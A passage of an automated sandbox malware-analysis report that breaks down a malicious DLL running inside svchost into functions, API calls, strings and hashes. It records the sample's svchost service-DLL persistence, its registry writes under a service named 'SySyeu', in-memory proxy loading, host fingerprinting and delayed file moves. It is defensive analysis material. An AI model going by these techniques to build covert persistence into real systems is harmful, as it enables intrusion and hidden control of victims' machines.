                                                                                                                • Instruction ID: 8fe5d1832865b8ccca8e0fc317077c96d8ecfcaf39360939d2f87a7bcfb0ed6c
                                                                                                                • Opcode Fuzzy Hash: 10262e34717a2dc6bb8153166a79431bc9c49f8163c052bb3b4c512cb2356511
                                                                                                                • Instruction Fuzzy Hash: 1E51B4B5A00109ABFF44DFA4CD82EEEB7BAFF48680F004019F605A7185DF75AA50CB95
                                                                                                                Function 100031D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 120libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 260 100031d2-10003244 LoadLibraryA GetProcAddress * 3 LoadLibraryA GetProcAddress 263 10003246-1000325b 260->263 264 1000325d-1000325f 260->264 263->264 267 10003264-10003268 263->267 265 100032f2-100032f6 264->265 268 1000326d-10003282 267->268 270 10003284-1000329a 268->270 271 100032d5-100032e0 268->271 276 100032ca-100032d3 270->276 277 1000329c-100032b7 270->277 274 100032e2-100032e3 FreeLibrary 271->274 275 100032e5-100032e8 271->275 274->275 278 100032ea-100032ed FreeLibrary 275->278 279 100032ef 275->279 276->268 282 100032c1-100032c5 277->282 283 100032b9-100032bc 277->283 278->279 279->265 282->276 283->282
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                                                • GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                                                • LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                                                • GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032E3
                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 100032ED
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressLibraryProc$FreeLoad
                                                                                                                • String ID: CoCreateInstance$CoInitialize$CoUninitialize$FriendlyName$Ole32.dll$Oleaut32.dll$SysFreeString
                                                                                                                • API String ID: 2256533930-3340630095
                                                                                                                • Opcode ID: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                                                • Instruction ID: 1885695b6b8551886770f00f979ae30a25f1f1d427a69892d216d7985a67bda5
                                                                                                                • Opcode Fuzzy Hash: f1eadba59b2ebd071f72d2f7cbb709308b938fb940b81a85d55ffd123040d419
                                                                                                                • Instruction Fuzzy Hash: 1641EA70A00219AFEB01DBA5CC88DEFBBBDFF89795B208459F505E7258D7719901CBA0
                                                                                                                Function 1000304F Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 85stringtimeCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                • wsprintfA.USER32 ref: 1000306C
                                                                                                                • strlen.MSVCRT ref: 10003078
                                                                                                                • strlen.MSVCRT ref: 1000308E
                                                                                                                  • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                                                  • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                                                • strlen.MSVCRT ref: 100030B4
                                                                                                                • GetLocalTime.KERNEL32(?), ref: 100030D7
                                                                                                                • wsprintfA.USER32 ref: 100030FF
                                                                                                                • strlen.MSVCRT ref: 1000310D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$strlen$Librarywsprintf$FreeLoadLocalTime
                                                                                                                • String ID: %4d-%.2d-%.2d %.2d:%.2d$Default$Group$InstallTime$Remark$SYSTEM\CurrentControlSet\Services\%s$SySyeu
                                                                                                                • API String ID: 124699875-2222266080
                                                                                                                • Opcode ID: 01154ca105bfda5f078472489b81bc39b1063e4cdbc4f1aa553d48ab01563500
                                                                                                                • Instruction ID: 2672780922b42b35e2a89e682ca47f3d516b1e1a70e82393c56e9bdbe1b2b31e
                                                                                                                • Opcode Fuzzy Hash: 01154ca105bfda5f078472489b81bc39b1063e4cdbc4f1aa553d48ab01563500
                                                                                                                • Instruction Fuzzy Hash: CE211DA28001287BF710E794DC89DFF76BDEB4D695F5400A6FA01E1049EB39AE418775
                                                                                                                Function 10004369 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 75libraryloaderCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 293 10004369-10004416 LoadLibraryA GetProcAddress * 4 LoadLibraryA GetProcAddress 297 10004425-10004428 293->297 298 10004418-10004423 293->298 299 1000442e-10004448 call 1000444c 297->299 298->297 302 1000442a 298->302 302->299
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(user32.dll,00000000,00000000,00000000), ref: 1000439A
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetThreadDesktop), ref: 100043AD
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 100043B8
                                                                                                                • GetProcAddress.KERNEL32(00000000,SetThreadDesktop), ref: 100043C3
                                                                                                                • GetProcAddress.KERNEL32(00000000,CloseDesktop), ref: 100043D1
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 100043DB
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetCurrentThreadId), ref: 100043E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$GetUserObjectInformationA$SetThreadDesktop$kernel32.dll$user32.dll
                                                                                                                • API String ID: 2238633743-588083535
                                                                                                                • Opcode ID: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                                                • Instruction ID: 67ebd5df9d46fa76e82372fdf0c3b5a8e4a25dc64441a3b0318b74b919e85c2a
                                                                                                                • Opcode Fuzzy Hash: 4c1376e7f27bce54e3710619517fe6f641db0fdfb4de06b67931ee9d63f56ed5
                                                                                                                • Instruction Fuzzy Hash: 212107B1D00228BBEB10EFA5DC44BEEBAFDEB48391F114126F911F2254DB7459408F64
                                                                                                                Function 100036BA Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 108stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 100036D4
                                                                                                                • wsprintfA.USER32 ref: 100036F4
                                                                                                                • lstrlenA.KERNEL32(?,00000000), ref: 10003706
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004857
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 1000486A
                                                                                                                  • Part of subcall function 10004822: memset.MSVCRT ref: 10004878
                                                                                                                  • Part of subcall function 10004822: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004885
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000489D
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 100048AD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 100048BD
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 100048CA
                                                                                                                  • Part of subcall function 10004822: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 100048D7
                                                                                                                  • Part of subcall function 10004822: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00002081,00000144,00000000), ref: 10004A63
                                                                                                                • memset.MSVCRT ref: 10003738
                                                                                                                • getsockname.WS2_32(?,?,?), ref: 10003751
                                                                                                                • memcpy.MSVCRT(?,?,00000004), ref: 10003764
                                                                                                                  • Part of subcall function 100035EA: lstrlenA.KERNEL32(?,?,1000377E,?,00000032,?,?,?,00000004), ref: 10003611
                                                                                                                  • Part of subcall function 100035EA: gethostname.WS2_32(?,?), ref: 10003621
                                                                                                                • GetVersionExA.KERNEL32(?), ref: 10003792
                                                                                                                  • Part of subcall function 1000358C: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 100035C9
                                                                                                                  • Part of subcall function 1000358C: wsprintfA.USER32 ref: 100035DE
                                                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 100037B0
                                                                                                                  • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Ole32.dll,?,00000144,00000000), ref: 100031E6
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 100031F6
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoUninitialize), ref: 10003201
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 1000320C
                                                                                                                  • Part of subcall function 100031D2: LoadLibraryA.KERNEL32(Oleaut32.dll,?,?,?,?,?,?,?,?,?,?,?,?,100037D5), ref: 10003216
                                                                                                                  • Part of subcall function 100031D2: GetProcAddress.KERNEL32(00000000,SysFreeString), ref: 10003221
                                                                                                                  • Part of subcall function 1000366A: LoadLibraryA.KERNEL32(kernel32.dll,?,00000144,00000000,?,?,100037E0), ref: 10003676
                                                                                                                  • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1000368E
                                                                                                                  • Part of subcall function 1000366A: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 10003698
                                                                                                                  • Part of subcall function 1000366A: FreeLibrary.KERNEL32(00000000), ref: 100036AC
                                                                                                                  • Part of subcall function 10003629: lstrlenA.KERNEL32(00000014,?,?,?,?,100037FD,?,00000014,?), ref: 10003650
                                                                                                                  • Part of subcall function 10003629: lstrcpyA.KERNEL32(00000014,Error,?,?,?,?,100037FD,?,00000014,?), ref: 10003662
                                                                                                                • lstrcpyA.KERNEL32(?,10006514), ref: 10003809
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 10001884
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,1000381E,?,00000144,00000000,1000381E,000000C8,00000144), ref: 1000189C
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018F3
                                                                                                                  • Part of subcall function 10001863: ??2@YAPAXI@Z.MSVCRT(00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 100018FB
                                                                                                                  • Part of subcall function 10001863: memcpy.MSVCRT(00000000,000000C8,00000001,00000001,00000144,00000144,1000381E,1000381E,00000004,1000381E,00000004,000000C8,00000004,?,00000003,?), ref: 1000190A
                                                                                                                  • Part of subcall function 10001863: ??3@YAXPAX@Z.MSVCRT(00000000,00000144,00000001,00000004,000000C8,00000004,?,00000003,?,00000144,00000000), ref: 10001932
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$memset$Load$lstrlenmemcpy$??2@??3@Freelstrcpywsprintf$GlobalInfoMemoryStatusSystemVersiongethostnamegetsockname
                                                                                                                • String ID: @$Group$SYSTEM\CurrentControlSet\Services\%s$SySyeu
                                                                                                                • API String ID: 1875266911-862850364
                                                                                                                • Opcode ID: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                                                • Instruction ID: 3133a6343b416fd9d4de8abc7d75c938e5c6614370202d51db2fcbf0203c4673
                                                                                                                • Opcode Fuzzy Hash: 955314d3c9f2b6115b712ce9295eb8f3d277e00088749fc94f886e12991fb5ce
                                                                                                                • Instruction Fuzzy Hash: 2C41FDB690121CAAEB10DBA4CC49FCEB7BCEB08340F104496F609E7195DB74AB448FA1
                                                                                                                Function 100024AC Relevance: 22.8, APIs: 9, Strings: 4, Instructions: 76COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • printf.MSVCRT ref: 100024B8
                                                                                                                • printf.MSVCRT ref: 100024C9
                                                                                                                • memset.MSVCRT ref: 100024FC
                                                                                                                • memcpy.MSVCRT(10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 10002505
                                                                                                                • ??2@YAPAXI@Z.MSVCRT(-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000250E
                                                                                                                • memcpy.MSVCRT(00000000,00000000,-00000064,-00000064,10006CF0,00000000,00000063,10006CF0,00000000,00000063,00000001), ref: 1000251B
                                                                                                                • printf.MSVCRT ref: 10002537
                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 10002561
                                                                                                                • printf.MSVCRT ref: 10002573
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: printf$memcpy$??2@??3@memset
                                                                                                                • String ID: Can't load library from memory.$Loop_Proxy$OpenProxy$hmProxy!= NULL
                                                                                                                • API String ID: 60333908-620223428
                                                                                                                • Opcode ID: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                                                • Instruction ID: 34426b20c795a1564e6a7497d8f5fa3a22278249d6d1bd148d0ebd3529ec88d4
                                                                                                                • Opcode Fuzzy Hash: 1d0c7509cf9b4937be937c3ffef0e8e5e866c158fea0c4347d35d9917c06a107
                                                                                                                • Instruction Fuzzy Hash: 07112B76A045247FF200E7B0AD45FAF339ECB087D6F210026FA009605EEE756D0043A9
                                                                                                                Function 10001E37 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 90stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 10001E3C
                                                                                                                • wsprintfA.USER32 ref: 10001E7B
                                                                                                                  • Part of subcall function 10001B5B: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,?,00000000), ref: 10001B96
                                                                                                                  • Part of subcall function 10001B5B: _local_unwind2.MSVCRT ref: 10001BA9
                                                                                                                • wsprintfA.USER32 ref: 10001EAE
                                                                                                                • strlen.MSVCRT ref: 10001EBB
                                                                                                                  • Part of subcall function 10004A93: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,00000000,?), ref: 10004AC0
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCreateKeyExA), ref: 10004AD7
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegSetValueExA), ref: 10004AE2
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteKeyA), ref: 10004AED
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegDeleteValueA), ref: 10004AF8
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegOpenKeyExA), ref: 10004B03
                                                                                                                  • Part of subcall function 10004A93: GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 10004B0E
                                                                                                                  • Part of subcall function 10004A93: FreeLibrary.KERNEL32(00000000,?,00000000,?), ref: 10004C02
                                                                                                                • memset.MSVCRT ref: 10001EEE
                                                                                                                • lstrcpyA.KERNEL32(?,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost), ref: 10001F02
                                                                                                                • lstrlenA.KERNEL32(?,00000001), ref: 10001F0B
                                                                                                                  • Part of subcall function 10001A43: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,SySyeu,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A54
                                                                                                                  • Part of subcall function 10001A43: OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A69
                                                                                                                  • Part of subcall function 10001A43: StartServiceA.ADVAPI32(00000000,00000000,00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A7A
                                                                                                                  • Part of subcall function 10001A43: GetLastError.KERNEL32(?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A84
                                                                                                                  • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001A92
                                                                                                                  • Part of subcall function 10001A43: CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,10003043,SySyeu), ref: 10001AC2
                                                                                                                Strings
                                                                                                                • SYSTEM\CurrentControlSet\Services\%s\Parameters, xrefs: 10001EA8
                                                                                                                • ServiceDll, xrefs: 10001ED2
                                                                                                                • %%SystemRoot%%\System32\svchost.exe -k "%s", xrefs: 10001E6F
                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost, xrefs: 10001EFC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Service$Open$CloseHandleLibraryManagerwsprintf$ErrorFreeH_prologLastLoadStart_local_unwind2lstrcpylstrlenmemsetstrlen
                                                                                                                • String ID: %%SystemRoot%%\System32\svchost.exe -k "%s"$SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost$SYSTEM\CurrentControlSet\Services\%s\Parameters$ServiceDll
                                                                                                                • API String ID: 1573142492-3522277913
                                                                                                                • Opcode ID: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                                                • Instruction ID: b0e3a08bed4d5a752cfc5ae4754fd9917613b9386cafdbad90e7966b10716f67
                                                                                                                • Opcode Fuzzy Hash: 0128ef592e1c99bbe64aa5232a117bdd0909c69419edbc971054f239723094cd
                                                                                                                • Instruction Fuzzy Hash: D9217EB290011CBBEB10DF94DC86EEF7B7DEB48780F104069FA08A2145EB715F558BA6
                                                                                                                Function 10002F7B Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69sleepprocessCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10001ACF: OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 10001ADF
                                                                                                                  • Part of subcall function 10001ACF: OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 10001AF5
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B06
                                                                                                                  • Part of subcall function 10001ACF: ControlService.ADVAPI32(00000000,00000001,?), ref: 10001B1D
                                                                                                                  • Part of subcall function 10001ACF: Sleep.KERNEL32(0000000A), ref: 10001B2F
                                                                                                                  • Part of subcall function 10001ACF: QueryServiceStatus.ADVAPI32(00000000,?), ref: 10001B3A
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B43
                                                                                                                  • Part of subcall function 10001ACF: CloseServiceHandle.ADVAPI32(00000000), ref: 10001B4A
                                                                                                                  • Part of subcall function 100020C8: GetModuleFileNameA.KERNEL32(?,00000104), ref: 100020E5
                                                                                                                  • Part of subcall function 100020C8: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100020F3
                                                                                                                  • Part of subcall function 100020C8: GetTickCount.KERNEL32 ref: 100020F9
                                                                                                                  • Part of subcall function 100020C8: wsprintfA.USER32 ref: 10002113
                                                                                                                  • Part of subcall function 100020C8: MoveFileA.KERNEL32(?,?), ref: 1000212A
                                                                                                                  • Part of subcall function 100020C8: MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000213B
                                                                                                                • wsprintfA.USER32 ref: 10002FC4
                                                                                                                • CreateProcessA.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10002FE7
                                                                                                                • GetModuleFileNameA.KERNEL32(?,00000104), ref: 10002FFF
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 1000300C
                                                                                                                • GetLastError.KERNEL32 ref: 10003018
                                                                                                                • Sleep.KERNEL32(000003E8), ref: 10003028
                                                                                                                • GetFileAttributesA.KERNEL32(?), ref: 10003035
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileService$AttributesCloseHandleModuleMoveNameOpenQuerySleepStatuswsprintf$ControlCountCreateDirectoryErrorLastManagerProcessSystemTick
                                                                                                                • String ID: D$GUpdate%s$SySyeu$WinSta0\Default
                                                                                                                • API String ID: 3185690247-1592408275
                                                                                                                • Opcode ID: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                                                • Instruction ID: ebf8a919204883b3cf295611002b4e487a781f5c3db184b4aeea1269bd5b3cbf
                                                                                                                • Opcode Fuzzy Hash: 677340bbb3e7d3deb07a041f04dc4ca50ceeb01c397db1cab97bb9b2955d953d
                                                                                                                • Instruction Fuzzy Hash: EB11B672401269AFFB11DBA0CC45EDF37BEFF09381F204051F506E2098DBB49A088BA1
                                                                                                                Function 1000473F Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 60libraryloaderstringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll), ref: 10004750
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 10004764
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 1000476E
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 10004779
                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 100047B1
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 100047D0
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 100047DB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.4131325751.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.4131288189.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131358371.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131391729.0000000010006000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.4131424734.0000000010007000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_svchost.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$CloseFreeHandleLoadlstrcmpi
                                                                                                                • String ID: CreateToolhelp32Snapshot$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 1314729832-4285911020
                                                                                                                • Opcode ID: edd1cf7752d3c0a317ed2cc814c912f2b541baf62ab1e742b5b3ac3e1cc50ead
                                                                                                                • Instruction ID: 62e2a4d820bdf17ee503cc2422b7b88c1aaff87933f8729642c2e5364a3b347a
                                                                                                                • Opcode Fuzzy Hash: edd1cf7752d3c0a317ed2cc814c912f2b541baf62ab1e742b5b3ac3e1cc50ead
                                                                                                                • Instruction Fuzzy Hash: F3115E71D01228ABFB10DB618C88FEEBBF8EF497C1F110095E904E2144DB75AA408AA4
                                                                                                                Function 10003B9E Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 106libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,?,?,?,?,?,1000397D), ref: 10003BC4
